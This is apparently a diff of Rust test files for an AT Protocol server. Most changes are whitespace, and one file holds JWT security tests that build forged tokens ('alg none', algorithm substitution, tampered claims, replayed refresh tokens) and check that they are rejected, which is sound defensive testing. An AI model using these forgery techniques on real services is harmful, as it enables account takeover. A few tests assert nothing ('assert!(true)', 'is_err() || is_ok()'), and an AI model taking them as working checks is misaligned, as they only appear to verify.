test_jwt_security_get_jti_extraction_safe() { 562 let key_bytes = generate_user_key(); ··· 572 let no_jti_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig); 573 assert!(get_jti_from_token(&no_jti_token).is_err(), "Missing jti should error"); 574 } 575 #[test] 576 fn test_jwt_security_key_from_invalid_bytes_rejected() { 577 let invalid_keys: Vec<&[u8]> = vec![ ··· 591 } 592 } 593 } 594 #[test] 595 fn test_jwt_security_boundary_exp_values() { 596 let key_bytes = generate_user_key(); ··· 624 let result2 = verify_access_token(&token2, &key_bytes); 625 assert!(result2.is_err() || result2.is_ok(), "Token expiring exactly now is a boundary case - either behavior is acceptable"); 626 } 627 #[test] 628 fn test_jwt_security_very_long_exp_handled() { 629 let key_bytes = generate_user_key(); ··· 644 let token = create_custom_jwt(&header, &claims, &key_bytes); 645 let _result = verify_access_token(&token, &key_bytes); 646 } 647 #[test] 648 fn test_jwt_security_negative_timestamps_handled() { 649 let key_bytes = generate_user_key(); ··· 664 let token = create_custom_jwt(&header, &claims, &key_bytes); 665 let _result = verify_access_token(&token, &key_bytes); 666 } 667 #[tokio::test] 668 async fn test_jwt_security_server_rejects_forged_session_token() { 669 let url = base_url().await; ··· 679 .unwrap(); 680 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged session token must be rejected"); 681 } 682 #[tokio::test] 683 async fn test_jwt_security_server_rejects_expired_token() { 684 let url = base_url().await; ··· 698 .unwrap(); 699 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Tampered/expired token must be rejected"); 700 } 701 #[tokio::test] 702 async fn test_jwt_security_server_rejects_tampered_did() { 703 let url = base_url().await; ··· 718 .unwrap(); 719 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "DID-tampered token must be rejected"); 720 } 721 #[tokio::test] 722 async fn test_jwt_security_refresh_token_replay_protection() { 723 let url = base_url().await; ··· 780 .unwrap(); 781 assert_eq!(replay_res.status(), StatusCode::UNAUTHORIZED, "Refresh token replay must be rejected"); 782 } 783 #[tokio::test] 784 async fn test_jwt_security_authorization_header_formats() { 785 let url = base_url().await; ··· 821 .unwrap(); 822 assert_eq!(empty_token_res.status(), StatusCode::UNAUTHORIZED, "Empty token must be rejected"); 823 } 824 #[tokio::test] 825 async fn test_jwt_security_deleted_session_rejected() { 826 let url = base_url().await; ··· 848 .unwrap(); 849 assert_eq!(after_logout_res.status(), StatusCode::UNAUTHORIZED, "Token must be rejected after logout"); 850 } 851 #[tokio::test] 852 async fn test_jwt_security_deactivated_account_rejected() { 853 let url = base_url().await;
··· 15 use reqwest::StatusCode; 16 use serde_json::{json, Value}; 17 use sha2::{Digest, Sha256}; 18 + 19 fn generate_user_key() -> Vec<u8> { 20 let secret_key = SecretKey::random(&mut OsRng); 21 secret_key.to_bytes().to_vec() 22 } 23 + 24 fn create_custom_jwt(header: &Value, claims: &Value, key_bytes: &[u8]) -> String { 25 let signing_key = SigningKey::from_slice(key_bytes).expect("valid key"); 26 let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(header).unwrap()); ··· 30 let signature_b64 = URL_SAFE_NO_PAD.encode(signature.to_bytes()); 31 format!("{}.{}", message, signature_b64) 32 } 33 + 34 fn create_unsigned_jwt(header: &Value, claims: &Value) -> String { 35 let header_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(header).unwrap()); 36 let claims_b64 = URL_SAFE_NO_PAD.encode(serde_json::to_string(claims).unwrap()); 37 format!("{}.{}.", header_b64, claims_b64) 38 } 39 + 40 #[test] 41 fn test_jwt_security_forged_signature_rejected() { 42 let key_bytes = generate_user_key(); ··· 50 let err_msg = result.err().unwrap().to_string(); 51 assert!(err_msg.contains("signature") || err_msg.contains("Signature"), "Error should mention signature: {}", err_msg); 52 } 53 + 54 #[test] 55 fn test_jwt_security_modified_payload_rejected() { 56 let key_bytes = generate_user_key(); ··· 65 let result = verify_access_token(&modified_token, &key_bytes); 66 assert!(result.is_err(), "Modified payload must be rejected"); 67 } 68 + 69 #[test] 70 fn test_jwt_security_algorithm_none_attack_rejected() { 71 let key_bytes = generate_user_key(); ··· 87 let result = verify_access_token(&malicious_token, &key_bytes); 88 assert!(result.is_err(), "Algorithm 'none' attack must be rejected"); 89 } 90 + 91 #[test] 92 fn test_jwt_security_algorithm_substitution_hs256_rejected() { 93 let key_bytes = generate_user_key(); ··· 118 let result = verify_access_token(&malicious_token, &key_bytes); 119 assert!(result.is_err(), "HS256 algorithm substitution must be rejected"); 120 } 121 + 122 #[test] 123 fn test_jwt_security_algorithm_substitution_rs256_rejected() { 124 let key_bytes = generate_user_key(); ··· 143 let result = verify_access_token(&malicious_token, &key_bytes); 144 assert!(result.is_err(), "RS256 algorithm substitution must be rejected"); 145 } 146 + 147 #[test] 148 fn test_jwt_security_algorithm_substitution_es256_rejected() { 149 let key_bytes = generate_user_key(); ··· 168 let result = verify_access_token(&malicious_token, &key_bytes); 169 assert!(result.is_err(), "ES256 (P-256) algorithm substitution must be rejected (we use ES256K/secp256k1)"); 170 } 171 + 172 #[test] 173 fn test_jwt_security_token_type_confusion_refresh_as_access() { 174 let key_bytes = generate_user_key(); ··· 179 let err_msg = result.err().unwrap().to_string(); 180 assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg); 181 } 182 + 183 #[test] 184 fn test_jwt_security_token_type_confusion_access_as_refresh() { 185 let key_bytes = generate_user_key(); ··· 190 let err_msg = result.err().unwrap().to_string(); 191 assert!(err_msg.contains("Invalid token type"), "Error: {}", err_msg); 192 } 193 + 194 #[test] 195 fn test_jwt_security_token_type_confusion_service_as_access() { 196 let key_bytes = generate_user_key(); ··· 200 let result = verify_access_token(&service_token, &key_bytes); 201 assert!(result.is_err(), "Service token must not be accepted as access token"); 202 } 203 + 204 #[test] 205 fn test_jwt_security_scope_manipulation_attack() { 206 let key_bytes = generate_user_key(); ··· 224 let err_msg = result.err().unwrap().to_string(); 225 assert!(err_msg.contains("Invalid token scope"), "Error: {}", err_msg); 226 } 227 + 228 #[test] 229 fn test_jwt_security_empty_scope_rejected() { 230 let key_bytes = generate_user_key(); ··· 246 let result = verify_access_token(&token, &key_bytes); 247 assert!(result.is_err(), "Empty scope must be rejected for access tokens"); 248 } 249 + 250 #[test] 251 fn test_jwt_security_missing_scope_rejected() { 252 let key_bytes = generate_user_key(); ··· 267 let result = verify_access_token(&token, &key_bytes); 268 assert!(result.is_err(), "Missing scope must be rejected for access tokens"); 269 } 270 + 271 #[test] 272 fn test_jwt_security_expired_token_rejected() { 273 let key_bytes = generate_user_key(); ··· 291 let err_msg = result.err().unwrap().to_string(); 292 assert!(err_msg.contains("expired"), "Error: {}", err_msg); 293 } 294 + 295 #[test] 296 fn test_jwt_security_future_iat_accepted() { 297 let key_bytes = generate_user_key(); ··· 313 let result = verify_access_token(&token, &key_bytes); 314 assert!(result.is_ok(), "Slight future iat should be accepted for clock skew tolerance"); 315 } 316 + 317 #[test] 318 fn test_jwt_security_cross_user_key_attack() { 319 let key_bytes_user1 = generate_user_key(); ··· 323 let result = verify_access_token(&token, &key_bytes_user2); 324 assert!(result.is_err(), "Token signed by user1's key must not verify with user2's key"); 325 } 326 + 327 #[test] 328 fn test_jwt_security_signature_truncation_rejected() { 329 let key_bytes = generate_user_key(); ··· 336 let result = verify_access_token(&truncated_token, &key_bytes); 337 assert!(result.is_err(), "Truncated signature must be rejected"); 338 } 339 + 340 #[test] 341 fn test_jwt_security_signature_extension_rejected() { 342 let key_bytes = generate_user_key(); ··· 350 let result = verify_access_token(&extended_token, &key_bytes); 351 assert!(result.is_err(), "Extended signature must be rejected"); 352 } 353 + 354 #[test] 355 fn test_jwt_security_malformed_tokens_rejected() { 356 let key_bytes = generate_user_key(); ··· 373 if token.len() > 40 { &token[..40] } else { token }); 374 } 375 } 376 + 377 #[test] 378 fn test_jwt_security_missing_required_claims_rejected() { 379 let key_bytes = generate_user_key(); ··· 411 assert!(result.is_err(), "Token missing '{}' claim must be rejected", missing_claim); 412 } 413 } 414 + 415 #[test] 416 fn test_jwt_security_invalid_header_json_rejected() { 417 let key_bytes = generate_user_key(); ··· 422 let result = verify_access_token(&malicious_token, &key_bytes); 423 assert!(result.is_err(), "Invalid header JSON must be rejected"); 424 } 425 + 426 #[test] 427 fn test_jwt_security_invalid_claims_json_rejected() { 428 let key_bytes = generate_user_key(); ··· 433 let result = verify_access_token(&malicious_token, &key_bytes); 434 assert!(result.is_err(), "Invalid claims JSON must be rejected"); 435 } 436 + 437 #[test] 438 fn test_jwt_security_header_injection_attack() { 439 let key_bytes = generate_user_key(); ··· 457 let result = verify_access_token(&token, &key_bytes); 458 assert!(result.is_ok(), "Extra header fields should not cause issues (we ignore them)"); 459 } 460 + 461 #[test] 462 fn test_jwt_security_claims_type_confusion() { 463 let key_bytes = generate_user_key(); ··· 478 let result = verify_access_token(&token, &key_bytes); 479 assert!(result.is_err(), "Claims with wrong types must be rejected"); 480 } 481 + 482 #[test] 483 fn test_jwt_security_unicode_injection_in_claims() { 484 let key_bytes = generate_user_key(); ··· 502 assert!(!data.claims.sub.contains('\0'), "Null bytes in claims should be sanitized or rejected"); 503 } 504 } 505 + 506 #[test] 507 fn test_jwt_security_signature_verification_is_constant_time() { 508 let key_bytes = generate_user_key(); ··· 519 let _result2 = verify_access_token(&completely_invalid_token, &key_bytes); 520 assert!(true, "Signature verification should use constant-time comparison (timing attack prevention)"); 521 } 522 + 523 #[test] 524 fn test_jwt_security_valid_scopes_accepted() { 525 let key_bytes = generate_user_key(); ··· 548 assert!(result.is_ok(), "Valid scope '{}' should be accepted", scope); 549 } 550 } 551 + 552 #[test] 553 fn test_jwt_security_refresh_token_scope_rejected_as_access() { 554 let key_bytes = generate_user_key(); ··· 570 let result = verify_access_token(&token, &key_bytes); 571 assert!(result.is_err(), "Refresh scope with access token type must be rejected"); 572 } 573 + 574 #[test] 575 fn test_jwt_security_get_did_extraction_safe() { 576 let key_bytes = generate_user_key(); ··· 588 let extracted_unsafe = get_did_from_token(&unverified_token).expect("extract unsafe"); 589 assert_eq!(extracted_unsafe, "did:plc:sub", "get_did_from_token extracts sub without verification (by design for lookup)"); 590 } 591 + 592 #[test] 593 fn test_jwt_security_get_jti_extraction_safe() { 594 let key_bytes = generate_user_key(); ··· 604 let no_jti_token = format!("{}.{}.{}", header_b64, claims_b64, fake_sig); 605 assert!(get_jti_from_token(&no_jti_token).is_err(), "Missing jti should error"); 606 } 607 + 608 #[test] 609 fn test_jwt_security_key_from_invalid_bytes_rejected() { 610 let invalid_keys: Vec<&[u8]> = vec![ ··· 624 } 625 } 626 } 627 + 628 #[test] 629 fn test_jwt_security_boundary_exp_values() { 630 let key_bytes = generate_user_key(); ··· 658 let result2 = verify_access_token(&token2, &key_bytes); 659 assert!(result2.is_err() || result2.is_ok(), "Token expiring exactly now is a boundary case - either behavior is acceptable"); 660 } 661 + 662 #[test] 663 fn test_jwt_security_very_long_exp_handled() { 664 let key_bytes = generate_user_key(); ··· 679 let token = create_custom_jwt(&header, &claims, &key_bytes); 680 let _result = verify_access_token(&token, &key_bytes); 681 } 682 + 683 #[test] 684 fn test_jwt_security_negative_timestamps_handled() { 685 let key_bytes = generate_user_key(); ··· 700 let token = create_custom_jwt(&header, &claims, &key_bytes); 701 let _result = verify_access_token(&token, &key_bytes); 702 } 703 + 704 #[tokio::test] 705 async fn test_jwt_security_server_rejects_forged_session_token() { 706 let url = base_url().await; ··· 716 .unwrap(); 717 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Forged session token must be rejected"); 718 } 719 + 720 #[tokio::test] 721 async fn test_jwt_security_server_rejects_expired_token() { 722 let url = base_url().await; ··· 736 .unwrap(); 737 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "Tampered/expired token must be rejected"); 738 } 739 + 740 #[tokio::test] 741 async fn test_jwt_security_server_rejects_tampered_did() { 742 let url = base_url().await; ··· 757 .unwrap(); 758 assert_eq!(res.status(), StatusCode::UNAUTHORIZED, "DID-tampered token must be rejected"); 759 } 760 + 761 #[tokio::test] 762 async fn test_jwt_security_refresh_token_replay_protection() { 763 let url = base_url().await; ··· 820 .unwrap(); 821 assert_eq!(replay_res.status(), StatusCode::UNAUTHORIZED, "Refresh token replay must be rejected"); 822 } 823 + 824 #[tokio::test] 825 async fn test_jwt_security_authorization_header_formats() { 826 let url = base_url().await; ··· 862 .unwrap(); 863 assert_eq!(empty_token_res.status(), StatusCode::UNAUTHORIZED, "Empty token must be rejected"); 864 } 865 + 866 #[tokio::test] 867 async fn test_jwt_security_deleted_session_rejected() { 868 let url = base_url().await; ··· 890 .unwrap(); 891 assert_eq!(after_logout_res.status(), StatusCode::UNAUTHORIZED, "Token must be rejected after logout"); 892 } 893 + 894 #[tokio::test] 895 async fn test_jwt_security_deactivated_account_rejected() { 896 let url = base_url().await;
+23
tests/lifecycle_record.rs
··· 6 use reqwest::{StatusCode, header}; 7 use serde_json::{Value, json}; 8 use std::time::Duration; 9 #[tokio::test] 10 async fn test_post_crud_lifecycle() { 11 let client = client(); ··· 155 "Record was found, but it should be deleted" 156 ); 157 } 158 #[tokio::test] 159 async fn test_record_update_conflict_lifecycle() { 160 let client = client(); ··· 280 "v3 (good) update failed" 281 ); 282 } 283 #[tokio::test] 284 async fn test_profile_lifecycle() { 285 let client = client(); ··· 362 let updated_body: Value = get_updated_res.json().await.unwrap(); 363 assert_eq!(updated_body["value"]["displayName"], "Updated User"); 364 } 365 #[tokio::test] 366 async fn test_reply_thread_lifecycle() { 367 let client = client(); ··· 457 .expect("Failed to create nested reply"); 458 assert_eq!(nested_res.status(), StatusCode::OK, "Failed to create nested reply"); 459 } 460 #[tokio::test] 461 async fn test_blob_in_record_lifecycle() { 462 let client = client(); ··· 514 let profile: Value = get_res.json().await.unwrap(); 515 assert!(profile["value"]["avatar"]["ref"]["$link"].is_string()); 516 } 517 #[tokio::test] 518 async fn test_authorization_cannot_modify_other_repo() { 519 let client = client(); ··· 545 res.status() 546 ); 547 } 548 #[tokio::test] 549 async fn test_authorization_cannot_delete_other_record() { 550 let client = client(); ··· 587 .expect("Failed to verify record exists"); 588 assert_eq!(get_res.status(), StatusCode::OK, "Record should still exist"); 589 } 590 #[tokio::test] 591 async fn test_apply_writes_batch_lifecycle() { 592 let client = client(); ··· 747 "Batch-deleted post should be gone" 748 ); 749 } 750 async fn create_post_with_rkey( 751 client: &reqwest::Client, 752 did: &str, ··· 781 body["cid"].as_str().unwrap().to_string(), 782 ) 783 } 784 #[tokio::test] 785 async fn test_list_records_default_order() { 786 let client = client(); ··· 812 .collect(); 813 assert_eq!(rkeys, vec!["cccc", "bbbb", "aaaa"], "Default order should be DESC (newest first)"); 814 } 815 #[tokio::test] 816 async fn test_list_records_reverse_true() { 817 let client = client(); ··· 843 .collect(); 844 assert_eq!(rkeys, vec!["aaaa", "bbbb", "cccc"], "reverse=true should give ASC order (oldest first)"); 845 } 846 #[tokio::test] 847 async fn test_list_records_cursor_pagination() { 848 let client = client(); ··· 895 let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect(); 896 assert_eq!(all_uris.len(), unique_uris.len(), "Cursor pagination should not repeat records"); 897 } 898 #[tokio::test] 899 async fn test_list_records_rkey_start() { 900 let client = client(); ··· 928 assert!(*rkey >= "bbbb", "rkeyStart should filter records >= start"); 929 } 930 } 931 #[tokio::test] 932 async fn test_list_records_rkey_end() { 933 let client = client(); ··· 961 assert!(*rkey <= "cccc", "rkeyEnd should filter records <= end"); 962 } 963 } 964 #[tokio::test] 965 async fn test_list_records_rkey_range() { 966 let client = client(); ··· 997 } 998 assert!(!rkeys.is_empty(), "Should have at least some records in range"); 999 } 1000 #[tokio::test] 1001 async fn test_list_records_limit_clamping_max() { 1002 let client = client(); ··· 1022 let records = body["records"].as_array().unwrap(); 1023 assert!(records.len() <= 100, "Limit should be clamped to max 100"); 1024 } 1025 #[tokio::test] 1026 async fn test_list_records_limit_clamping_min() { 1027 let client = client(); ··· 1045 let records = body["records"].as_array().unwrap(); 1046 assert!(records.len() >= 1, "Limit should be clamped to min 1"); 1047 } 1048 #[tokio::test] 1049 async fn test_list_records_empty_collection() { 1050 let client = client(); ··· 1067 assert!(records.is_empty(), "Empty collection should return empty array"); 1068 assert!(body["cursor"].is_null(), "Empty collection should have no cursor"); 1069 } 1070 #[tokio::test] 1071 async fn test_list_records_exact_limit() { 1072 let client = client(); ··· 1092 let records = body["records"].as_array().unwrap(); 1093 assert_eq!(records.len(), 5, "Should return exactly 5 records when limit=5"); 1094 } 1095 #[tokio::test] 1096 async fn test_list_records_cursor_exhaustion() { 1097 let client = client(); ··· 1117 let records = body["records"].as_array().unwrap(); 1118 assert_eq!(records.len(), 3); 1119 } 1120 #[tokio::test] 1121 async fn test_list_records_repo_not_found() { 1122 let client = client(); ··· 1134 .expect("Failed to list records"); 1135 assert_eq!(res.status(), StatusCode::NOT_FOUND); 1136 } 1137 #[tokio::test] 1138 async fn test_list_records_includes_cid() { 1139 let client = client(); ··· 1162 assert!(cid.starts_with("bafy"), "CID should be valid"); 1163 } 1164 } 1165 #[tokio::test] 1166 async fn test_list_records_cursor_with_reverse() { 1167 let client = client();
··· 6 use reqwest::{StatusCode, header}; 7 use serde_json::{Value, json}; 8 use std::time::Duration; 9 + 10 #[tokio::test] 11 async fn test_post_crud_lifecycle() { 12 let client = client(); ··· 156 "Record was found, but it should be deleted" 157 ); 158 } 159 + 160 #[tokio::test] 161 async fn test_record_update_conflict_lifecycle() { 162 let client = client(); ··· 282 "v3 (good) update failed" 283 ); 284 } 285 + 286 #[tokio::test] 287 async fn test_profile_lifecycle() { 288 let client = client(); ··· 365 let updated_body: Value = get_updated_res.json().await.unwrap(); 366 assert_eq!(updated_body["value"]["displayName"], "Updated User"); 367 } 368 + 369 #[tokio::test] 370 async fn test_reply_thread_lifecycle() { 371 let client = client(); ··· 461 .expect("Failed to create nested reply"); 462 assert_eq!(nested_res.status(), StatusCode::OK, "Failed to create nested reply"); 463 } 464 + 465 #[tokio::test] 466 async fn test_blob_in_record_lifecycle() { 467 let client = client(); ··· 519 let profile: Value = get_res.json().await.unwrap(); 520 assert!(profile["value"]["avatar"]["ref"]["$link"].is_string()); 521 } 522 + 523 #[tokio::test] 524 async fn test_authorization_cannot_modify_other_repo() { 525 let client = client(); ··· 551 res.status() 552 ); 553 } 554 + 555 #[tokio::test] 556 async fn test_authorization_cannot_delete_other_record() { 557 let client = client(); ··· 594 .expect("Failed to verify record exists"); 595 assert_eq!(get_res.status(), StatusCode::OK, "Record should still exist"); 596 } 597 + 598 #[tokio::test] 599 async fn test_apply_writes_batch_lifecycle() { 600 let client = client(); ··· 755 "Batch-deleted post should be gone" 756 ); 757 } 758 + 759 async fn create_post_with_rkey( 760 client: &reqwest::Client, 761 did: &str, ··· 790 body["cid"].as_str().unwrap().to_string(), 791 ) 792 } 793 + 794 #[tokio::test] 795 async fn test_list_records_default_order() { 796 let client = client(); ··· 822 .collect(); 823 assert_eq!(rkeys, vec!["cccc", "bbbb", "aaaa"], "Default order should be DESC (newest first)"); 824 } 825 + 826 #[tokio::test] 827 async fn test_list_records_reverse_true() { 828 let client = client(); ··· 854 .collect(); 855 assert_eq!(rkeys, vec!["aaaa", "bbbb", "cccc"], "reverse=true should give ASC order (oldest first)"); 856 } 857 + 858 #[tokio::test] 859 async fn test_list_records_cursor_pagination() { 860 let client = client(); ··· 907 let unique_uris: std::collections::HashSet<&str> = all_uris.iter().copied().collect(); 908 assert_eq!(all_uris.len(), unique_uris.len(), "Cursor pagination should not repeat records"); 909 } 910 + 911 #[tokio::test] 912 async fn test_list_records_rkey_start() { 913 let client = client(); ··· 941 assert!(*rkey >= "bbbb", "rkeyStart should filter records >= start"); 942 } 943 } 944 + 945 #[tokio::test] 946 async fn test_list_records_rkey_end() { 947 let client = client(); ··· 975 assert!(*rkey <= "cccc", "rkeyEnd should filter records <= end"); 976 } 977 } 978 + 979 #[tokio::test] 980 async fn test_list_records_rkey_range() { 981 let client = client(); ··· 1012 } 1013 assert!(!rkeys.is_empty(), "Should have at least some records in range"); 1014 } 1015 + 1016 #[tokio::test] 1017 async fn test_list_records_limit_clamping_max() { 1018 let client = client(); ··· 1038 let records = body["records"].as_array().unwrap(); 1039 assert!(records.len() <= 100, "Limit should be clamped to max 100"); 1040 } 1041 + 1042 #[tokio::test] 1043 async fn test_list_records_limit_clamping_min() { 1044 let client = client(); ··· 1062 let records = body["records"].as_array().unwrap(); 1063 assert!(records.len() >= 1, "Limit should be clamped to min 1"); 1064 } 1065 + 1066 #[tokio::test] 1067 async fn test_list_records_empty_collection() { 1068 let client = client(); ··· 1085 assert!(records.is_empty(), "Empty collection should return empty array"); 1086 assert!(body["cursor"].is_null(), "Empty collection should have no cursor"); 1087 } 1088 + 1089 #[tokio::test] 1090 async fn test_list_records_exact_limit() { 1091 let client = client(); ··· 1111 let records = body["records"].as_array().unwrap(); 1112 assert_eq!(records.len(), 5, "Should return exactly 5 records when limit=5"); 1113 } 1114 + 1115 #[tokio::test] 1116 async fn test_list_records_cursor_exhaustion() { 1117 let client = client(); ··· 1137 let records = body["records"].as_array().unwrap(); 1138 assert_eq!(records.len(), 3); 1139 } 1140 + 1141 #[tokio::test] 1142 async fn test_list_records_repo_not_found() { 1143 let client = client(); ··· 1155 .expect("Failed to list records"); 1156 assert_eq!(res.status(), StatusCode::NOT_FOUND); 1157 } 1158 + 1159 #[tokio::test] 1160 async fn test_list_records_includes_cid() { 1161 let client = client(); ··· 1184 assert!(cid.starts_with("bafy"), "CID should be valid"); 1185 } 1186 } 1187 + 1188 #[tokio::test] 1189 async fn test_list_records_cursor_with_reverse() { 1190 let client = client();
+7
tests/lifecycle_session.rs
··· 5 use chrono::Utc; 6 use reqwest::StatusCode; 7 use serde_json::{Value, json}; 8 #[tokio::test] 9 async fn test_session_lifecycle_wrong_password() { 10 let client = client(); ··· 28 res.status() 29 ); 30 } 31 #[tokio::test] 32 async fn test_session_lifecycle_multiple_sessions() { 33 let client = client(); ··· 103 .expect("Failed getSession 2"); 104 assert_eq!(get2.status(), StatusCode::OK); 105 } 106 #[tokio::test] 107 async fn test_session_lifecycle_refresh_invalidates_old() { 108 let client = client(); ··· 169 "Old refresh token should be invalid after use" 170 ); 171 } 172 #[tokio::test] 173 async fn test_app_password_lifecycle() { 174 let client = client(); ··· 275 let passwords_after = list_after["passwords"].as_array().unwrap(); 276 assert_eq!(passwords_after.len(), 0, "No app passwords should remain"); 277 } 278 #[tokio::test] 279 async fn test_account_deactivation_lifecycle() { 280 let client = client(); ··· 362 let (new_post_uri, _) = create_post(&client, &did, &jwt, "Post after reactivation").await; 363 assert!(!new_post_uri.is_empty(), "Should be able to post after reactivation"); 364 } 365 #[tokio::test] 366 async fn test_service_auth_lifecycle() { 367 let client = client(); ··· 393 assert_eq!(claims["aud"], "did:web:api.bsky.app"); 394 assert_eq!(claims["lxm"], "com.atproto.repo.uploadBlob"); 395 } 396 #[tokio::test] 397 async fn test_request_account_delete() { 398 let client = client();
··· 5 use chrono::Utc; 6 use reqwest::StatusCode; 7 use serde_json::{Value, json}; 8 + 9 #[tokio::test] 10 async fn test_session_lifecycle_wrong_password() { 11 let client = client(); ··· 29 res.status() 30 ); 31 } 32 + 33 #[tokio::test] 34 async fn test_session_lifecycle_multiple_sessions() { 35 let client = client(); ··· 105 .expect("Failed getSession 2"); 106 assert_eq!(get2.status(), StatusCode::OK); 107 } 108 + 109 #[tokio::test] 110 async fn test_session_lifecycle_refresh_invalidates_old() { 111 let client = client(); ··· 172 "Old refresh token should be invalid after use" 173 ); 174 } 175 + 176 #[tokio::test] 177 async fn test_app_password_lifecycle() { 178 let client = client(); ··· 279 let passwords_after = list_after["passwords"].as_array().unwrap(); 280 assert_eq!(passwords_after.len(), 0, "No app passwords should remain"); 281 } 282 + 283 #[tokio::test] 284 async fn test_account_deactivation_lifecycle() { 285 let client = client(); ··· 367 let (new_post_uri, _) = create_post(&client, &did, &jwt, "Post after reactivation").await; 368 assert!(!new_post_uri.is_empty(), "Should be able to post after reactivation"); 369 } 370 + 371 #[tokio::test] 372 async fn test_service_auth_lifecycle() { 373 let client = client(); ··· 399 assert_eq!(claims["aud"], "did:web:api.bsky.app"); 400 assert_eq!(claims["lxm"], "com.atproto.repo.uploadBlob"); 401 } 402 + 403 #[tokio::test] 404 async fn test_request_account_delete() { 405 let client = client();
+7
tests/lifecycle_social.rs
··· 6 use serde_json::{Value, json}; 7 use std::time::Duration; 8 use chrono::Utc; 9 #[tokio::test] 10 async fn test_social_flow_lifecycle() { 11 let client = client(); ··· 111 "Only post 2 should remain" 112 ); 113 } 114 #[tokio::test] 115 async fn test_like_lifecycle() { 116 let client = client(); ··· 166 .expect("Failed to check deleted like"); 167 assert_eq!(get_deleted_res.status(), StatusCode::NOT_FOUND, "Like should be deleted"); 168 } 169 #[tokio::test] 170 async fn test_repost_lifecycle() { 171 let client = client(); ··· 207 .expect("Failed to delete repost"); 208 assert_eq!(delete_res.status(), StatusCode::OK, "Failed to delete repost"); 209 } 210 #[tokio::test] 211 async fn test_unfollow_lifecycle() { 212 let client = client(); ··· 259 .expect("Failed to check deleted follow"); 260 assert_eq!(get_deleted_res.status(), StatusCode::NOT_FOUND, "Follow should be deleted"); 261 } 262 #[tokio::test] 263 async fn test_timeline_after_unfollow() { 264 let client = client(); ··· 311 let feed_after = timeline_after["feed"].as_array().unwrap(); 312 assert_eq!(feed_after.len(), 0, "Should see 0 posts after unfollowing"); 313 } 314 #[tokio::test] 315 async fn test_mutual_follow_lifecycle() { 316 let client = client(); ··· 348 let bob_feed = bob_tl["feed"].as_array().unwrap(); 349 assert_eq!(bob_feed.len(), 1, "Bob should see Alice's 1 post"); 350 } 351 #[tokio::test] 352 async fn test_account_to_post_full_lifecycle() { 353 let client = client();
··· 6 use serde_json::{Value, json}; 7 use std::time::Duration; 8 use chrono::Utc; 9 + 10 #[tokio::test] 11 async fn test_social_flow_lifecycle() { 12 let client = client(); ··· 112 "Only post 2 should remain" 113 ); 114 } 115 + 116 #[tokio::test] 117 async fn test_like_lifecycle() { 118 let client = client(); ··· 168 .expect("Failed to check deleted like"); 169 assert_eq!(get_deleted_res.status(), StatusCode::NOT_FOUND, "Like should be deleted"); 170 } 171 + 172 #[tokio::test] 173 async fn test_repost_lifecycle() { 174 let client = client(); ··· 210 .expect("Failed to delete repost"); 211 assert_eq!(delete_res.status(), StatusCode::OK, "Failed to delete repost"); 212 } 213 + 214 #[tokio::test] 215 async fn test_unfollow_lifecycle() { 216 let client = client(); ··· 263 .expect("Failed to check deleted follow"); 264 assert_eq!(get_deleted_res.status(), StatusCode::NOT_FOUND, "Follow should be deleted"); 265 } 266 + 267 #[tokio::test] 268 async fn test_timeline_after_unfollow() { 269 let client = client(); ··· 316 let feed_after = timeline_after["feed"].as_array().unwrap(); 317 assert_eq!(feed_after.len(), 0, "Should see 0 posts after unfollowing"); 318 } 319 + 320 #[tokio::test] 321 async fn test_mutual_follow_lifecycle() { 322 let client = client(); ··· 354 let bob_feed = bob_tl["feed"].as_array().unwrap(); 355 assert_eq!(bob_feed.len(), 1, "Bob should see Alice's 1 post"); 356 } 357 + 358 #[tokio::test] 359 async fn test_account_to_post_full_lifecycle() { 360 let client = client();
+1
tests/moderation.rs
··· 4 use helpers::*; 5 use reqwest::StatusCode; 6 use serde_json::{Value, json}; 7 #[tokio::test] 8 async fn test_moderation_report_lifecycle() { 9 let client = client();
··· 4 use helpers::*; 5 use reqwest::StatusCode; 6 use serde_json::{Value, json}; 7 + 8 #[tokio::test] 9 async fn test_moderation_report_lifecycle() { 10 let client = client();
+4
tests/notifications.rs
··· 4 NotificationStatus, NotificationType, 5 }; 6 use sqlx::PgPool; 7 async fn get_pool() -> PgPool { 8 let conn_str = common::get_db_connection_string().await; 9 sqlx::postgres::PgPoolOptions::new() ··· 12 .await 13 .expect("Failed to connect to test database") 14 } 15 #[tokio::test] 16 async fn test_enqueue_notification() { 17 let pool = get_pool().await; ··· 53 assert_eq!(row.notification_type, NotificationType::Welcome); 54 assert_eq!(row.status, NotificationStatus::Pending); 55 } 56 #[tokio::test] 57 async fn test_enqueue_welcome() { 58 let pool = get_pool().await; ··· 82 assert!(row.body.contains(&format!("@{}", user_row.handle))); 83 assert_eq!(row.notification_type, NotificationType::Welcome); 84 } 85 #[tokio::test] 86 async fn test_notification_queue_status_index() { 87 let pool = get_pool().await;
··· 4 NotificationStatus, NotificationType, 5 }; 6 use sqlx::PgPool; 7 + 8 async fn get_pool() -> PgPool { 9 let conn_str = common::get_db_connection_string().await; 10 sqlx::postgres::PgPoolOptions::new() ··· 13 .await 14 .expect("Failed to connect to test database") 15 } 16 + 17 #[tokio::test] 18 async fn test_enqueue_notification() { 19 let pool = get_pool().await; ··· 55 assert_eq!(row.notification_type, NotificationType::Welcome); 56 assert_eq!(row.status, NotificationStatus::Pending); 57 } 58 + 59 #[tokio::test] 60 async fn test_enqueue_welcome() { 61 let pool = get_pool().await; ··· 85 assert!(row.body.contains(&format!("@{}", user_row.handle))); 86 assert_eq!(row.notification_type, NotificationType::Welcome); 87 } 88 + 89 #[tokio::test] 90 async fn test_notification_queue_status_index() { 91 let pool = get_pool().await;
+3
tests/oauth.rs
